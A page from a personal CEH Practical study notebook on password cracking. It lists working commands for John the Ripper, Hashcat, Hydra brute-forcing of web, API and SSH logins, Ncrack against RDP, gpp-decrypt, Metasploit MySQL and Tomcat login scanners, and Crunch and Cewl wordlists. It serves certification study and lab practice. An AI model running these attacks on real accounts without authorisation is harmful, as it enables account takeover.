Book of Eopi
  • 😍About the Author
  • 🤖ChatGPT for Cybersecurity
  • 📘CERTIFICATIONS
    • Certified Ethical Hacker (C|EH)(Practical)
      • Reconnaissance (Footprinting)
      • Scanning Networks
      • Vulnerability Analysis
      • System Hacking
      • Sniffing
      • SQL Injection
      • Remote code execution
      • Hacking Web Applications & Servers
        • Local and remote file inclusion
        • File upload bypass
        • Cross-site scripting
        • Cross-site request forgery
        • Server-side request forgery
      • Exploitation
        • Working with exploits
        • Password cracking
        • Metasploit
        • Buffer overflow
      • Cloud Computing
      • Cryptography
      • Mobile Pentesting Resources
      • Learning resources
  • 🏁My Hacking Materials
    • My Most Frequently Used Hacking Commands
    • RickdiculouslyEasy: 1 VulnHub WriteUp
    • Corrosion: 2 VulnHub WriteUp
    • Hackable: 3 VulnHub WriteUp
    • Empire: LupinOne Vulnhub WriteUp
  • 🐧101 Labs for Linux
    • 💻Hardware and System Configuration
      • LAB 1 - Boot Sequence
  • 🔧Mod Nintendo Switch Game
    • 🔹Pokémon Brilliant Diamond and Shining Pearl
      • 🟥Install mods on Nintendo Switch
      • 🟦Install mods on Yuzu/Ryujinx Emulator
      • 🔠Custom font for Pokémon BDSP
  • 📖SHARE TÀI LIỆU NVSP
    • 1️⃣HỌC PHẦN 1
    • 2️⃣HỌC PHẦN 2
    • 3️⃣HỌC PHẦN 3
    • 4️⃣HỌC PHẦN 4
    • 5️⃣HỌC PHẦN 5 (chưa hoàn thiện)
    • 6️⃣HỌC PHẦN 6
  • ⚔️Tổng Hợp Võ Lâm 2
    • 💰Server JX2 2014 - Bản Kinh Doanh
    • 👑Server JX2 2014 - Phiên bản Offline
    • 👑Server JX2 2017 - Phiên Bản Offline
    • 👑Server JX2 2021 - Phiên Bản Offline
Powered by GitBook
On this page
  • Identifying hashes
  • John the Ripper
  • Hydra
  • Websites
  • SSH
  • Hashcat
  • Ncrack
  • GPP-decrypt
  • MySQL brute force
  • Apache Tomcat brute force
  • Custom wordlists
  • Crunch
  • Cewl
  1. CERTIFICATIONS
  2. Certified Ethical Hacker (C|EH)(Practical)
  3. Exploitation

Password cracking

Password cracking is the process of using an application program to identify an unknown or forgotten password to a computer or network resource.

PreviousWorking with exploitsNextMetasploit

Last updated 2 years ago

Passwords can be brute-forced (e.g. just iterating through different letter/number combinations) but it is probably more efficient to use a dictionary. In Kali, wordlists can be found in /usr/share/wordlists. Both fasttrack and rockyou are good for testing weak passwords. Many applications and services are installed with , so always check for those before attempting to crack them.

Identifying hashes

Passwords will often be hashed in databases, sometimes with a salt. If the database/application includes a salt with the password, you'll need to some research to figure out how it is used in the hashed password. For example, it might be concatenated with the password (salt + password, password + salt) before hashing, or it may be hashed multiple times.

Identifying hashes using hash-identifer:

hash-identifier

John the Ripper

John is useful for offline password cracking, with a hash stored in a text file.

Usage:

john --wordlist=/usr/share/wordlists/rockyou.txt -format=Raw-MD5 /root/Desktop/john.txt

The format option is not always necessary as john does a decent job of guessing. Here's a .

Hydra

Hydra is a command-line tool for online password attacks, such as website login pages and ssh. The options can be tricky, so you can use as an alternative for websites. However, it seems to have trouble loading large wordlists such as rockyou.

Websites

General format for website attacks:

hydra -L <username list> -p <password list> [host] http-post-form "<path>:<form parameters>:<failed login message>"
hydra -L <wordlist> -P <password list> [host] http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

Attack WordPress login page with a known username, success parameter S= instead of failure parameter, verbose output:

hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V

JSON and APIs

It's a pain in the ass, but you can submit API responses and read them using Hydra. You just have to escape every " and : in the JSON messages:

hydra -l [username] -P /usr/share/wordlists/fasttrack.txt [host] https-form-post "/api/account/login:{\"email\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:S=userInfo" -V

Because of issues like throttling and API lockouts, you may want to use Burp Intruder instead, because it lets you read different server responses.

SSH

General usage:

hydra -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh

SSH with a non-standard port (22022):

hydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh

SSH with a username wordlist, non-standard port, limited threads and verbose output:

hydra -s 22022 -L userlist.txt -P /usr/share/wordlists/fasttrack.txt [host] ssh -t 4  -v

Hashcat

General usage:

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt --force
  • m is the hash format (e.g. m 13100 is Kerberos 5)

  • a 0 is a dictionary attack

  • o cracked.txt is the output file for the cracked password

  • target_hashes.txt is the hash to be cracked

  • /usr/share/wordlists/rockyou.txt is the absolute path to the wordlist

  • --force is something I always have to add (think it's GPU-related)

Ncrack

Ncrack can be used to crack RDP passwords:

ncrack -vv --user username -P password-file.txt rdp://[host]

GPP-decrypt

Group Policy Preferences (GPP) has been used in the past to allow Windows administrators to create domain policies with embedded credentials. These policies allowed administrators to set local accounts, embed credentials for the purposes of mapping drives, or perform other tasks that may otherwise require an embedded password in a script.

Once you find and download the groups.xml file, extract the contents of cpassword and use gpp-decrypt:

gpp-decrypt [hash]

MySQL brute force

With Metasploit:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts [target]
msf auxiliary(mysql_login) > set rport [port]
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > run

Apache Tomcat brute force

With Metasploit:

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts [target]
msf auxiliary(tomcat_mgr_login) > set rport [port, usually 8080]
msf auxiliary(tomcat_mgr_login) > set ssl true
msf auxiliary(tomcat_mgr_login) > set stop_on_success true
msf auxiliary(tomcat_mgr_login) > run

By default, Metasploit will use its list of default Tomcat usernames and passwords, but you could set a single username with set username or run a custom list with set user_file. You can also run a longer password list with set pass_file. Depending on how fast the server responds, you could use a big wordlist but otherwise stick to fasttrack.txt.

Custom wordlists

Custom wordlists are useful when targeting a specific organization or individual, to generate more relevant password lists.

Crunch

Crunch generates a custom password lists that can be used to guess passwords. These include:

  • All combinations for a number of letters.

  • All combinations for a range of characters followed by static text.

  • Password lists based on default password ranges (default router passwords for example).

General usage:

crunch [min length] [max length] [charset] [options]

Generates a password list with all possible combinations of 4 capital letters:

crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ -o /root/Desktop/wordlist.txt

Generate a list with all combinations for 5 digits:

crunch 5 5 0123456789 -o /root/Desktop/wordlist.txt

Generate a wordlist that contains all possible combinations with four letters followed by 1980:

crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t @@@@1980 -o /root/Desktop/wordlist.txt

Use the -p option defining the charset which eliminates repeating characters or words. This is creates a wordlist using different combinations of specific words.

Generate all combinations of the words ‘Dog Cat Mouse’:

crunch 1 2 -p Dog Cat Mouse -o /root/Desktop/wordlist.txt

Cewl

Cewl scrapes websites for text to generate a custom password list.

Options:

  • -m is the minimum word length for words to save to the wordlist.

  • -d is the maximum depth the spider is allowed to scrape.

  • -o is offsite, used to allow the spider to leave the current website to another website.

  • -w is write to output file, specify the output file here.

Example: use Cewl on the Kali Linux website to find words with 8 letters or greater and go 1 level deep:

cewl -d 1 -m 8 -w /root/Desktop/cewl.txt https://www.loliteam.net

Hydra is useful for brute-forcing website login pages, but you'll need to and parameters for success or failure.

Attack login page:

Hashcat is a very fast password-cracking tool, with .

Unfortunately, the password that is stored in the policy is , meaning anyone who can access the GPP . Since GPPs are stored on the domain controller in the SYSVOL share, this means that at a minimum all domain users can access the encrypted credentials.

📘
default passwords
list of supported formats
Burp Intruder
pass it the HTTP request string using Burp's proxy
DVWA
many supported formats
encrypted with a known key
can obtain the plain text password